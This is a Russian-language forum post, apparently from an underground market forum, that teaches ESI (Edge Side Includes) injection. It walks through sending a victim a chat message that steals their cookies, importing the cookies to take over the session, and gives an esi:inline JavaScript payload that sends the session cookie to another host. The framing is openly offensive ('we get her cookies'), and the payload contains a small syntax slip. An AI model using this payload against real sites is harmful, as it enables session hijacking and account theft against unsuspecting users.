✍️ Статья ESI injection

The 146X Project Dublikat Web Studio Avram Lincoln AL Service Navigator Knyaz

Tartuga

💰 Проверенный продавец
Регистрация
19.12.2019
Сообщения
93
Данный материал будет посвящен ESI Injection. Что такое ESI? Edge Side Includes - это небольшой язык разметки для динамической сборки веб-контента. Данный язык вставляется в HTML код тегом <esi>. Вот пример его использование <esi:include src="index.html" />Этот код выведет на вебстраницу контент из index.html.

Esi инъекция производится также как и XSS, банальный пример с чатом. Злоумышленник кидает подобное сообщение жертве

45a90711a89fbd3a0baf7.png

И после того как изображение прогрузится у жертвы, мы получим её куки:

5568812a40c685f2abb0a.png

Потом просто ставим их в любой редактор куки:

adfe1242688059c0fca47.png

Что даст нам доступ до сессии:

11a91387056084e2585b3.png

Также с помощью ESI можно интегрировать JS код, пример перехвата куки, правда для его работы на сервере должен быть предустановлен jQuery:

<esi:inline name="jquery.js" />
var xss = new XMLHttpRequest();
xss.open("GET", "//site.local/?
<esi:vars>$(HTTP_COOKIE{session_cookie})</esi:vars>");
xss.send():
</esi:inline>
 

📌 Золотая реклама

AnonPaste

Верх